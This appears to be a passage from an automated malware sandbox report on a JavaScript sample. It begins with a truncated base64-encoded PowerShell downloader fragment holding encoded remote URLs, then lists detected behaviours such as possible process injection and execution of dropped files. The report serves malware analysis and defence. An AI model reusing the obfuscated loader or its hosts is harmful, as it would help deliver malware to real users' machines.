QAxAEEARABVAEEATABnAEEAeQBBAEQARQBBAE8AUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABNAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEAIgA7ACQAdwBlAGkAcgBkAGUAcgBBAGcAeQByAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAZABnAEIAbABBAEcAawBBAGQAQQBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAGQAdwBCAHYAQQBIAEkAQQBhAHcAQQA9AHgAaAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AdwBBAHoAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3068 resumed a thread in remote process 2276
NtResumeThread June 15, 2023, 9:57 a.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 2276	1	0	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

EEmkwV3LNleuc.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All